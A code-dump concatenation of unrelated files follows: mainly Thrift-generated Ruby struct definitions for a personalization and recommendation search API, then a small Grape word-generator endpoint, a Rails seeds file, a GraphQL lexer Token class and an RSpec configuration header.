BOUNDSONLY => {:type => ::Thrift::Types::BOOL, :name => 'boundsOnly', :default => false}
}
def struct_fields; FIELDS; end
def validate
unless @dateRangeGap.nil? || ::DateRangeGap::VALID_VALUES.include?(@dateRangeGap)
raise ::Thrift::ProtocolException.new(::Thrift::ProtocolException::UNKNOWN, 'Invalid value of field dateRangeGap!')
end
unless @sortOrder.nil? || ::FacetSortOrder::VALID_VALUES.include?(@sortOrder)
raise ::Thrift::ProtocolException.new(::Thrift::ProtocolException::UNKNOWN, 'Invalid value of field sortOrder!')
end
end
::Thrift::Struct.generate_accessors self
end
# field to be used for sorting
class SortField
include ::Thrift::Struct, ::Thrift::Struct_Union
FIELDNAME = 1
REVERSE = 2
FIELDS = {
FIELDNAME => {:type => ::Thrift::Types::STRING, :name => 'fieldName'},
REVERSE => {:type => ::Thrift::Types::BOOL, :name => 'reverse'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>indexId</dt>
# <dd>indexId to be used for search</dd>
#
# <dt>language</dt>
# <dd>language for localization</dd>
#
# <dt>queryText</dt>
# <dd>main search query</dd>
#
# <dt>filters</dt>
# <dd>list of filters to apply</dd>
#
# <dt>orFilters</dt>
# <dd>whether boolean OR should be aplied to the given list of filters if false
# boolean AND will be applied</dd>
#
# <dt>facetRequests</dt>
# <dd>list of facets to be returned</dd>
#
# <dt>sortFields</dt>
# <dd>optional list of sort fields for hardcoded sorting. If not given,
# relevance sort order will be used</dd>
#
# <dt>offset</dt>
# <dd>from which hit to return result</dd>
#
# <dt>hitCount</dt>
# <dd>how many hits to return</dd>
#
# <dt>returnFields</dt>
# <dd>which index fields to be returned</dd>
#
# <dt>groupBy</dt>
# <dd>field name of the field to do grouping by</dd>
#
# <dt>groupFacets</dt>
# <dd>whether facets counts should contain number of groups</dd>
#
# <dt>groupItemsCount</dt>
# <dd>how many hits in each group to return</dd>
#
# <dt>groupItemsSort</dt>
# <dd>how to sort items within the group, default is score</dd>
#
# <dt>groupItemsSortAscending</dt>
# <dd>whether to sort items within the group ascending</dd>
#
# <dt>hitsGroupsAsHits</dt>
# <dd>if true, will return hitsGroups as hits in the response</dd>
# </dl>
class SimpleSearchQuery
include ::Thrift::Struct, ::Thrift::Struct_Union
INDEXID = 1
LANGUAGE = 2
QUERYTEXT = 3
FILTERS = 4
ORFILTERS = 5
FACETREQUESTS = 6
SORTFIELDS = 7
OFFSET = 8
HITCOUNT = 9
RETURNFIELDS = 10
GROUPBY = 20
GROUPFACETS = 30
GROUPITEMSCOUNT = 40
GROUPITEMSSORT = 50
GROUPITEMSSORTASCENDING = 60
HITSGROUPSASHITS = 70
FIELDS = {
INDEXID => {:type => ::Thrift::Types::STRING, :name => 'indexId'},
LANGUAGE => {:type => ::Thrift::Types::STRING, :name => 'language'},
QUERYTEXT => {:type => ::Thrift::Types::STRING, :name => 'queryText'},
FILTERS => {:type => ::Thrift::Types::LIST, :name => 'filters', :element => {:type => ::Thrift::Types::STRUCT, :class => ::Filter}},
ORFILTERS => {:type => ::Thrift::Types::BOOL, :name => 'orFilters'},
FACETREQUESTS => {:type => ::Thrift::Types::LIST, :name => 'facetRequests', :element => {:type => ::Thrift::Types::STRUCT, :class => ::FacetRequest}},
SORTFIELDS => {:type => ::Thrift::Types::LIST, :name => 'sortFields', :element => {:type => ::Thrift::Types::STRUCT, :class => ::SortField}},
OFFSET => {:type => ::Thrift::Types::I64, :name => 'offset'},
HITCOUNT => {:type => ::Thrift::Types::I32, :name => 'hitCount'},
RETURNFIELDS => {:type => ::Thrift::Types::LIST, :name => 'returnFields', :element => {:type => ::Thrift::Types::STRING}},
GROUPBY => {:type => ::Thrift::Types::STRING, :name => 'groupBy'},
GROUPFACETS => {:type => ::Thrift::Types::BOOL, :name => 'groupFacets', :default => true},
GROUPITEMSCOUNT => {:type => ::Thrift::Types::I32, :name => 'groupItemsCount', :default => 1},
GROUPITEMSSORT => {:type => ::Thrift::Types::STRING, :name => 'groupItemsSort', :default => %q"score"},
GROUPITEMSSORTASCENDING => {:type => ::Thrift::Types::BOOL, :name => 'groupItemsSortAscending', :default => false},
HITSGROUPSASHITS => {:type => ::Thrift::Types::BOOL, :name => 'hitsGroupsAsHits', :default => false}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>indexId</dt>
# <dd>id of the index to fetch context item data from</dd>
#
# <dt>fieldName</dt>
# <dd>the field name of the item's unique identifier within the items index</dd>
# <dd>for example: 'sku' for items 'products'</dd>
#
# <dt>contextItemId</dt>
# <dd>actual item's identifier</dd>
# <dd>for example: actual sku of the product</dd>
#
# <dt>role</dt>
# <dd>role of the item within the context, used to address the item in the
# recommendation script.</dd>
# <dd>for example: 'main product' for recommendations within product detail
# page</dd>
# </dl>
class ContextItem
include ::Thrift::Struct, ::Thrift::Struct_Union
INDEXID = 1
FIELDNAME = 2
CONTEXTITEMID = 3
ROLE = 4
FIELDS = {
INDEXID => {:type => ::Thrift::Types::STRING, :name => 'indexId'},
FIELDNAME => {:type => ::Thrift::Types::STRING, :name => 'fieldName'},
CONTEXTITEMID => {:type => ::Thrift::Types::STRING, :name => 'contextItemId'},
ROLE => {:type => ::Thrift::Types::STRING, :name => 'role'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>choiceId</dt>
# <dd>personalization choice identificator</dd>
#
# <dt>simpleSearchQuery</dt>
# <dd>search query in a case of recommendation and search inquiries</dd>
#
# <dt>contextItems</dt>
# <dd>context items for recommendations</dd>
#
# <dt>minHitCount</dt>
# <dd>minimal hit count to return for recommendations.</dd>
# <dd>if higher priority recommendation strategy yields less results, next
# strategy is tried</dd>
#
# <dt>excludeVariantIds</dt>
# <dd>set of variantIds to be excluded from result, has no effect if null or empty</dd>
#
# <dt>includeVariantIds</dt>
# <dd>set of variantIds to be included in the result, has no effect if null or empty</dd>
#
# <dt>scope</dt>
# <dd>choice source to be used</dd>
#
# <dt>withRelaxation</dt>
# <dd>if search relaxation should be used</dd>
# </dl>
class ChoiceInquiry
include ::Thrift::Struct, ::Thrift::Struct_Union
CHOICEID = 1
SIMPLESEARCHQUERY = 2
CONTEXTITEMS = 3
MINHITCOUNT = 4
EXCLUDEVARIANTIDS = 5
SCOPE = 6
WITHRELAXATION = 70
WITHSEMANTICFILTERING = 80
INCLUDEVARIANTIDS = 90
FIELDS = {
CHOICEID => {:type => ::Thrift::Types::STRING, :name => 'choiceId'},
SIMPLESEARCHQUERY => {:type => ::Thrift::Types::STRUCT, :name => 'simpleSearchQuery', :class => ::SimpleSearchQuery},
CONTEXTITEMS => {:type => ::Thrift::Types::LIST, :name => 'contextItems', :element => {:type => ::Thrift::Types::STRUCT, :class => ::ContextItem}},
MINHITCOUNT => {:type => ::Thrift::Types::I32, :name => 'minHitCount'},
EXCLUDEVARIANTIDS => {:type => ::Thrift::Types::SET, :name => 'excludeVariantIds', :element => {:type => ::Thrift::Types::STRING}},
SCOPE => {:type => ::Thrift::Types::STRING, :name => 'scope', :default => %q"system_rec"},
WITHRELAXATION => {:type => ::Thrift::Types::BOOL, :name => 'withRelaxation', :default => false},
WITHSEMANTICFILTERING => {:type => ::Thrift::Types::BOOL, :name => 'withSemanticFiltering', :default => false},
INCLUDEVARIANTIDS => {:type => ::Thrift::Types::SET, :name => 'includeVariantIds', :element => {:type => ::Thrift::Types::STRING}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# parameters of request context. Usually browser, platform, etc.
class RequestContext
include ::Thrift::Struct, ::Thrift::Struct_Union
PARAMETERS = 1
FIELDS = {
PARAMETERS => {:type => ::Thrift::Types::MAP, :name => 'parameters', :key => {:type => ::Thrift::Types::STRING}, :value => {:type => ::Thrift::Types::LIST, :element => {:type => ::Thrift::Types::STRING}}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# unique identifier of the customer
class UserRecord
include ::Thrift::Struct, ::Thrift::Struct_Union
USERNAME = 1
APIKEY = 10
APISECRET = 20
FIELDS = {
USERNAME => {:type => ::Thrift::Types::STRING, :name => 'username'},
APIKEY => {:type => ::Thrift::Types::STRING, :name => 'apiKey'},
APISECRET => {:type => ::Thrift::Types::STRING, :name => 'apiSecret'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>profileId</dt>
# <dd>profile (visitor) identificator</dd>
#
# <dt>inquiries</dt>
# <dd>list of inquiries to be executed sequentially.</dd>
# <dd>Inquiries with higher index may depend from those with lower index.</dd>
#
# <dt>requestContext</dt>
# <dd>context of the request</dd>
# </dl>
class ChoiceRequest
include ::Thrift::Struct, ::Thrift::Struct_Union
USERRECORD = 1
PROFILEID = 2
INQUIRIES = 3
REQUESTCONTEXT = 4
FIELDS = {
USERRECORD => {:type => ::Thrift::Types::STRUCT, :name => 'userRecord', :class => ::UserRecord},
PROFILEID => {:type => ::Thrift::Types::STRING, :name => 'profileId'},
INQUIRIES => {:type => ::Thrift::Types::LIST, :name => 'inquiries', :element => {:type => ::Thrift::Types::STRUCT, :class => ::ChoiceInquiry}},
REQUESTCONTEXT => {:type => ::Thrift::Types::STRUCT, :name => 'requestContext', :class => ::RequestContext}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>fieldName</dt>
# <dd>name of the facet field</dd>
#
# <dt>values</dt>
# <dd>list of facet values</dd>
# </dl>
class FacetResponse
include ::Thrift::Struct, ::Thrift::Struct_Union
FIELDNAME = 1
VALUES = 2
FIELDS = {
FIELDNAME => {:type => ::Thrift::Types::STRING, :name => 'fieldName'},
VALUES => {:type => ::Thrift::Types::LIST, :name => 'values', :element => {:type => ::Thrift::Types::STRUCT, :class => ::FacetValue}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# item found
#
# <dl>
# <dt>values</dt>
# <dd>map containing name of the field and list of values as strings</dd>
# <dd>if index contains no value for a field, empty array will be returned.</dd>
#
# <dt>score</dt>
# <dd>index score of the hit</dd>
#
# <dt>scenarioId</dt>
# <dd>source scenarioId in case of mixed recommendations modes</dd>
# </dl>
class Hit
include ::Thrift::Struct, ::Thrift::Struct_Union
VALUES = 1
SCORE = 2
SCENARIOID = 30
FIELDS = {
VALUES => {:type => ::Thrift::Types::MAP, :name => 'values', :key => {:type => ::Thrift::Types::STRING}, :value => {:type => ::Thrift::Types::LIST, :element => {:type => ::Thrift::Types::STRING}}},
SCORE => {:type => ::Thrift::Types::DOUBLE, :name => 'score'},
SCENARIOID => {:type => ::Thrift::Types::STRING, :name => 'scenarioId'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# grouped item found
#
# <dl>
# <dt>groupValue</dt>
# <dd>value of the groupBy field</dd>
#
# <dt>totalHitCount</dt>
# <dd>total hits count within the group</dd>
#
# <dt>hits</dt>
# <dd>group hits</dd>
# </dl>
class HitsGroup
include ::Thrift::Struct, ::Thrift::Struct_Union
GROUPVALUE = 10
TOTALHITCOUNT = 20
HITS = 30
FIELDS = {
GROUPVALUE => {:type => ::Thrift::Types::STRING, :name => 'groupValue'},
TOTALHITCOUNT => {:type => ::Thrift::Types::I64, :name => 'totalHitCount'},
HITS => {:type => ::Thrift::Types::LIST, :name => 'hits', :element => {:type => ::Thrift::Types::STRUCT, :class => ::Hit}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>hits</dt>
# <dd>list of hits found for given SimpleSearchQuery</dd>
#
# <dt>facetResponses</dt>
# <dd>list of requested facets or null if none requested</dd>
#
# <dt>totalHitCount</dt>
# <dd>total number of hits; -1 in case of mixed recommendation strategy</dd>
#
# <dt>queryText</dt>
# <dd>relaxation query text for relaxation results or requested queryText for a
# regular SearchResult</dd>
#
# <dt>hitsGroups</dt>
# <dd>grouped hits; not null when corresponding SimplSearchQuery has
# groupBy!=null </dd>
# </dl>
class SearchResult
include ::Thrift::Struct, ::Thrift::Struct_Union
HITS = 1
FACETRESPONSES = 2
TOTALHITCOUNT = 3
QUERYTEXT = 40
HITSGROUPS = 50
FIELDS = {
HITS => {:type => ::Thrift::Types::LIST, :name => 'hits', :element => {:type => ::Thrift::Types::STRUCT, :class => ::Hit}},
FACETRESPONSES => {:type => ::Thrift::Types::LIST, :name => 'facetResponses', :element => {:type => ::Thrift::Types::STRUCT, :class => ::FacetResponse}},
TOTALHITCOUNT => {:type => ::Thrift::Types::I64, :name => 'totalHitCount'},
QUERYTEXT => {:type => ::Thrift::Types::STRING, :name => 'queryText'},
HITSGROUPS => {:type => ::Thrift::Types::LIST, :name => 'hitsGroups', :element => {:type => ::Thrift::Types::STRUCT, :class => ::HitsGroup}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class SearchRelaxation
include ::Thrift::Struct, ::Thrift::Struct_Union
SUGGESTIONSRESULTS = 10
SUBPHRASESRESULTS = 20
FIELDS = {
SUGGESTIONSRESULTS => {:type => ::Thrift::Types::LIST, :name => 'suggestionsResults', :element => {:type => ::Thrift::Types::STRUCT, :class => ::SearchResult}},
SUBPHRASESRESULTS => {:type => ::Thrift::Types::LIST, :name => 'subphrasesResults', :element => {:type => ::Thrift::Types::STRUCT, :class => ::SearchResult}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>variantId</dt>
# <dd>id of the personalized variant</dd>
#
# <dt>scenarioId</dt>
# <dd>scenario identificator used to produce recommendation result or search
# result personalization</dd>
#
# <dt>searchResult</dt>
# <dd>result of the search request for recommendations and search requests</dd>
#
# <dt>searchResultTitle</dt>
# <dd>recommendation's result title localized in language requested in
# corresponding SimpleSearchQuery</dd>
#
# <dt>searchRelaxation</dt>
# <dd>When the service considers queryText invalid, it will evaluate and return
# relaxations if it is requested in corresponding ChoiceInquiry and if
# relaxations could be found.</dd>
# <dd>Note that original query still could yield some results; it is up to the
# client to decide whether searchRelaxations should be used (with displaying
# appropriate message) or not.</dd>
# </dl>
class Variant
include ::Thrift::Struct, ::Thrift::Struct_Union
VARIANTID = 1
SCENARIOID = 2
SEARCHRESULT = 3
SEARCHRESULTTITLE = 4
SEARCHRELAXATION = 50
SEMANTICFILTERINGRESULTS = 60
FIELDS = {
VARIANTID => {:type => ::Thrift::Types::STRING, :name => 'variantId'},
SCENARIOID => {:type => ::Thrift::Types::STRING, :name => 'scenarioId'},
SEARCHRESULT => {:type => ::Thrift::Types::STRUCT, :name => 'searchResult', :class => ::SearchResult},
SEARCHRESULTTITLE => {:type => ::Thrift::Types::STRING, :name => 'searchResultTitle'},
SEARCHRELAXATION => {:type => ::Thrift::Types::STRUCT, :name => 'searchRelaxation', :class => ::SearchRelaxation},
SEMANTICFILTERINGRESULTS => {:type => ::Thrift::Types::LIST, :name => 'semanticFilteringResults', :element => {:type => ::Thrift::Types::STRUCT, :class => ::SearchResult}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# list of personalized variants. Item's index corresponds to the index of the
# ChoiceInquiry
class ChoiceResponse
include ::Thrift::Struct, ::Thrift::Struct_Union
VARIANTS = 1
FIELDS = {
VARIANTS => {:type => ::Thrift::Types::LIST, :name => 'variants', :element => {:type => ::Thrift::Types::STRUCT, :class => ::Variant}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class ProfilePropertyValue
include ::Thrift::Struct, ::Thrift::Struct_Union
PROFILEID = 1
PROPERTYNAME = 2
PROPERTYVALUE = 3
CONFIDENCE = 4
FIELDS = {
PROFILEID => {:type => ::Thrift::Types::STRING, :name => 'profileId'},
PROPERTYNAME => {:type => ::Thrift::Types::STRING, :name => 'propertyName'},
PROPERTYVALUE => {:type => ::Thrift::Types::STRING, :name => 'propertyValue'},
CONFIDENCE => {:type => ::Thrift::Types::I32, :name => 'confidence'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class ProfileContext
include ::Thrift::Struct, ::Thrift::Struct_Union
PROFILEID = 1
REQUESTCONTEXT = 2
FIELDS = {
PROFILEID => {:type => ::Thrift::Types::STRING, :name => 'profileId'},
REQUESTCONTEXT => {:type => ::Thrift::Types::STRUCT, :name => 'requestContext', :class => ::RequestContext}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>choiceInquiry</dt>
# <dd><b>deprecated</b> - use choiceInquiries instead.</dd>
# <dd>If choiceInquiries is given this field will be ignored</dd>
#
# <dt>choiceInquiries</dt>
# <dd>list of ChoiceInquiries to be executed sequentially.</dd>
# <dd>Note that list items can depend of items before in list</dd>
#
# <dt>requestContext</dt>
# <dd><b>deprecated</b> - use profileContexts instead.</dd>
#
# <dt>profileIds</dt>
# <dd><b>deprecated</b> - use profileContexts instead.</dd>
# </dl>
class BatchChoiceRequest
include ::Thrift::Struct, ::Thrift::Struct_Union
USERRECORD = 1
CHOICEINQUIRY = 2
REQUESTCONTEXT = 3
PROFILEIDS = 4
CHOICEINQUIRIES = 5
PROFILECONTEXTS = 6
FIELDS = {
USERRECORD => {:type => ::Thrift::Types::STRUCT, :name => 'userRecord', :class => ::UserRecord},
CHOICEINQUIRY => {:type => ::Thrift::Types::STRUCT, :name => 'choiceInquiry', :class => ::ChoiceInquiry},
REQUESTCONTEXT => {:type => ::Thrift::Types::STRUCT, :name => 'requestContext', :class => ::RequestContext},
PROFILEIDS => {:type => ::Thrift::Types::LIST, :name => 'profileIds', :element => {:type => ::Thrift::Types::STRING}},
CHOICEINQUIRIES => {:type => ::Thrift::Types::LIST, :name => 'choiceInquiries', :element => {:type => ::Thrift::Types::STRUCT, :class => ::ChoiceInquiry}},
PROFILECONTEXTS => {:type => ::Thrift::Types::LIST, :name => 'profileContexts', :element => {:type => ::Thrift::Types::STRUCT, :class => ::ProfileContext}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# <dl>
# <dt>variants</dt>
# <dd><b>deprecated</b> - contains non-null value only if
# corresponding BatchChoiceRequest had only one ChoiceInquiry</dd>
#
# <dt>selectedVariants</dt>
# <dd>outer list corresponds to profileIds given in BatchChoiceRequest, while
# inner list corresponds to list of ChoiceInquiries from BatchChoiceRequest</dd>
# </dl>
class BatchChoiceResponse
include ::Thrift::Struct, ::Thrift::Struct_Union
VARIANTS = 1
SELECTEDVARIANTS = 2
FIELDS = {
VARIANTS => {:type => ::Thrift::Types::LIST, :name => 'variants', :element => {:type => ::Thrift::Types::STRUCT, :class => ::Variant}},
SELECTEDVARIANTS => {:type => ::Thrift::Types::LIST, :name => 'selectedVariants', :element => {:type => ::Thrift::Types::LIST, :element => {:type => ::Thrift::Types::STRUCT, :class => ::Variant}}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class AutocompleteHit
include ::Thrift::Struct, ::Thrift::Struct_Union
SUGGESTION = 11
HIGHLIGHTED = 21
SEARCHRESULT = 31
SCORE = 41
FIELDS = {
SUGGESTION => {:type => ::Thrift::Types::STRING, :name => 'suggestion'},
HIGHLIGHTED => {:type => ::Thrift::Types::STRING, :name => 'highlighted'},
SEARCHRESULT => {:type => ::Thrift::Types::STRUCT, :name => 'searchResult', :class => ::SearchResult},
SCORE => {:type => ::Thrift::Types::DOUBLE, :name => 'score'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class AutocompleteQuery
include ::Thrift::Struct, ::Thrift::Struct_Union
INDEXID = 11
LANGUAGE = 21
QUERYTEXT = 31
SUGGESTIONSHITCOUNT = 41
HIGHLIGHT = 51
HIGHLIGHTPRE = 61
HIGHLIGHTPOST = 71
FIELDS = {
INDEXID => {:type => ::Thrift::Types::STRING, :name => 'indexId'},
LANGUAGE => {:type => ::Thrift::Types::STRING, :name => 'language'},
QUERYTEXT => {:type => ::Thrift::Types::STRING, :name => 'queryText'},
SUGGESTIONSHITCOUNT => {:type => ::Thrift::Types::I32, :name => 'suggestionsHitCount'},
HIGHLIGHT => {:type => ::Thrift::Types::BOOL, :name => 'highlight'},
HIGHLIGHTPRE => {:type => ::Thrift::Types::STRING, :name => 'highlightPre', :default => %q"<em>"},
HIGHLIGHTPOST => {:type => ::Thrift::Types::STRING, :name => 'highlightPost', :default => %q"</em>"}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class AutocompleteRequest
include ::Thrift::Struct, ::Thrift::Struct_Union
USERRECORD = 11
SCOPE = 21
CHOICEID = 31
PROFILEID = 41
REQUESTCONTEXT = 51
EXCLUDEVARIANTIDS = 61
AUTOCOMPLETEQUERY = 71
SEARCHCHOICEID = 81
SEARCHQUERY = 91
INCLUDEVARIANTIDS = 101
PROPERTYQUERIES = 110
FIELDS = {
USERRECORD => {:type => ::Thrift::Types::STRUCT, :name => 'userRecord', :class => ::UserRecord},
SCOPE => {:type => ::Thrift::Types::STRING, :name => 'scope', :default => %q"system_rec"},
CHOICEID => {:type => ::Thrift::Types::STRING, :name => 'choiceId'},
PROFILEID => {:type => ::Thrift::Types::STRING, :name => 'profileId'},
REQUESTCONTEXT => {:type => ::Thrift::Types::STRUCT, :name => 'requestContext', :class => ::RequestContext},
EXCLUDEVARIANTIDS => {:type => ::Thrift::Types::SET, :name => 'excludeVariantIds', :element => {:type => ::Thrift::Types::STRING}},
AUTOCOMPLETEQUERY => {:type => ::Thrift::Types::STRUCT, :name => 'autocompleteQuery', :class => ::AutocompleteQuery},
SEARCHCHOICEID => {:type => ::Thrift::Types::STRING, :name => 'searchChoiceId'},
SEARCHQUERY => {:type => ::Thrift::Types::STRUCT, :name => 'searchQuery', :class => ::SimpleSearchQuery},
INCLUDEVARIANTIDS => {:type => ::Thrift::Types::SET, :name => 'includeVariantIds', :element => {:type => ::Thrift::Types::STRING}},
#PROPERTYQUERIES => {:type => ::Thrift::Types::LIST, :name => 'propertyQueries', :element => {:type => ::Thrift::Types::STRUCT, :class => ::PropertyQuery}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class PropertyQuery
include ::Thrift::Struct, ::Thrift::Struct_Union
NAME = 11
HITCOUNT = 21
EVALUATETOTAL = 31
FIELDS = {
NAME => {:type => ::Thrift::Types::STRING, :name => 'name'},
HITCOUNT => {:type => ::Thrift::Types::I32, :name => 'hitCount'},
EVALUATETOTAL => {:type => ::Thrift::Types::BOOL, :name => 'evaluateTotal'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class PropertyResult
include ::Thrift::Struct, ::Thrift::Struct_Union
HITS = 11
NAME = 21
FIELDS = {
# HITS => {:type => ::Thrift::Types::LIST, :name => 'hits', :element => {:type => ::Thrift::Types::STRUCT, :class => ::PropertyHit}},
NAME => {:type => ::Thrift::Types::STRING, :name => 'name'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class PropertyHit
include ::Thrift::Struct, ::Thrift::Struct_Union
VALUE = 11
LABEL = 21
TOTALHITCOUNT = 31
FIELDS = {
VALUE => {:type => ::Thrift::Types::STRING, :name => 'value'},
LABEL => {:type => ::Thrift::Types::STRING, :name => 'label'},
TOTALHITCOUNT => {:type => ::Thrift::Types::I64, :name => 'totalHitCount'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class AutocompleteResponse
include ::Thrift::Struct, ::Thrift::Struct_Union
HITS = 11
PREFIXSEARCHRESULT = 21
PROPERTYRESULTS = 31
FIELDS = {
HITS => {:type => ::Thrift::Types::LIST, :name => 'hits', :element => {:type => ::Thrift::Types::STRUCT, :class => ::AutocompleteHit}},
PREFIXSEARCHRESULT => {:type => ::Thrift::Types::STRUCT, :name => 'prefixSearchResult', :class => ::SearchResult},
PROPERTYRESULTS => {:type => ::Thrift::Types::LIST, :name => 'propertyResults', :element => {:type => ::Thrift::Types::STRUCT, :class => ::PropertyResult}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class AutocompleteRequestBundle
include ::Thrift::Struct, ::Thrift::Struct_Union
REQUESTS = 11
FIELDS = {
REQUESTS => {:type => ::Thrift::Types::LIST, :name => 'requests', :element => {:type => ::Thrift::Types::STRUCT, :class => ::AutocompleteRequest}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class AutocompleteResponseBundle
include ::Thrift::Struct, ::Thrift::Struct_Union
RESPONSES = 11
FIELDS = {
RESPONSES => {:type => ::Thrift::Types::LIST, :name => 'responses', :element => {:type => ::Thrift::Types::STRUCT, :class => ::AutocompleteResponse}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# Request object for changing the choice, that is changing possible variants
# or their random distribution
class ChoiceUpdateRequest
include ::Thrift::Struct, ::Thrift::Struct_Union
USERRECORD = 11
CHOICEID = 21
VARIANTIDS = 31
FIELDS = {
# user record identifying the client
USERRECORD => {:type => ::Thrift::Types::STRUCT, :name => 'userRecord', :class => ::UserRecord},
# Identifier of the choice to be changed. If it is not given, a new choice will be created
CHOICEID => {:type => ::Thrift::Types::STRING, :name => 'choiceId'},
# Map containing variant identifier and corresponding positive integer weight.
# If for a choice there is no learned rule which can be applied, weights of
# variants will be used for variants random distribution.
# Higher weight makes corresponding variant more probable.
VARIANTIDS => {:type => ::Thrift::Types::MAP, :name => 'variantIds', :key => {:type => ::Thrift::Types::STRING}, :value => {:type => ::Thrift::Types::I32}}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
# Server response for one ChoiceUpdateRequest
class ChoiceUpdateResponse
include ::Thrift::Struct, ::Thrift::Struct_Union
CHOICEID = 11
FIELDS = {
# Identifier of the changed choice. If no id is given in corresponding
# ChoiceUpdateRequest, new choice (and new id) will be created and retuned.
CHOICEID => {:type => ::Thrift::Types::STRING, :name => 'choiceId'}
}
def struct_fields; FIELDS; end
def validate
end
::Thrift::Struct.generate_accessors self
end
class P13nServiceException < ::Thrift::Exception
include ::Thrift::Struct, ::Thrift::Struct_Union
def initialize(message=nil)
super()
self.message = message
end
MESSAGE = 1
FIELDS = {
MESSAGE => {:type => ::Thrift::Types::STRING, :name => 'message'}
}
def struct_fields; FIELDS; end
def validate
raise ::Thrift::ProtocolException.new(::Thrift::ProtocolException::UNKNOWN, 'Required field message is unset!') unless @message
end
::Thrift::Struct.generate_accessors self
end
| 31.479638 | 208 | 0.654707 |
ac681b2b41f3c7114178b51b74b15d41b9ac891e | 545 | module WordsGenerator
module Api
class Words < Grape::API
format :json
namespace :words do
get '/' do
words = Words.generate_words
{words: words.sample(1 + rand(words.length)).join(' ')}
end
end
private
def self.generate_words
[
Forgery('basic').color,
Forgery('lorem_ipsum').word,
Forgery('name').company_name,
Forgery('name').female_first_name,
Forgery('name').industry
]
end
end
end
end
| 19.464286 | 65 | 0.537615 |
33ff29a2ce2ed6ad2b98df96a9468a8fa8338691 | 832 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
User.delete_all
Todo.delete_all
Event.delete_all
User.create(name: "Asta", zip: "86337")
Todo.create(item: "Clean Bathroom", user_id: User.first.id)
Todo.create(item: "Lunch with Charmy", user_id: User.first.id)
Todo.create(item: "Fourth Workout", user_id: User.first.id)
Event.create(title: "Nero - Birth Anniversary", date:"18/06/2021", user_id: User.first.id)
Event.create(title: "Yuno & My - Birth Anniversary", date:"10/04/2021", user_id: User.first.id) | 41.6 | 111 | 0.727163 |
acec66544907bc94fbc60acfddfa3d8082d75b34 | 911 | # frozen_string_literal: true
module GraphQL
module Language
# Emitted by the lexer and passed to the parser.
# Contains type, value and position data.
class Token
if !String.method_defined?(:-@)
using GraphQL::StringDedupBackport
end
# @return [Symbol] The kind of token this is
attr_reader :name
# @return [String] The text of this token
attr_reader :value
attr_reader :prev_token, :line, :col
def initialize(name, value, line, col, prev_token)
@name = name
@value = -value
@line = line
@col = col
@prev_token = prev_token
end
alias_method :to_s, :value
def to_i; @value.to_i; end
def to_f; @value.to_f; end
def line_and_column
[@line, @col]
end
def inspect
"(#{@name} #{@value.inspect} [#{@line}:#{@col}])"
end
end
end
end
| 23.358974 | 57 | 0.586169 |
269ba588d9809081ec3598beb60b77bd131e1740 | 4,882 | # This file was generated by the `rspec --init` command. Conventionally, all
# specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`.
# The generated `.rspec` file contains `--require spec_helper` which will cause
# this file to always be loaded, without a need to explicitly require it in any
# files.
#
# Given that it is always loaded, you are encouraged to keep this file as
# light-weight as possible. Requiring heavyweight dependencies from this file
# will add to the boot time of your test suite on EVERY test run, even for an
# individual file that may not need all of that loaded. Instead, consider making
# a separate helper file that requires the additional dependencies and performs
# the additional setup, and require it from the spec files that actually need
# it.
#
# See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration
RSpec.configure do |config|
# rspec-expectations config goes here. You can use an alternate
# assertion/expectation library such as wrong or the stdlib/minitest
# assertions if you prefer.
config.expect_with :rspec do |expectations|
# This option will default to `true` in RSpec 4. It makes the `description`
# and `failure_message` of custom matchers include text for helper methods
# defined using `chain`, e.g.:
# be_bigger_than(2).and_smaller_than(4).description
# # => "be bigger than 2 and smaller than 4"
# ...rather than:
# # => "be bigger than 2"
expectations.include_chain_clauses_in_custom_matcher_descriptions = true
end
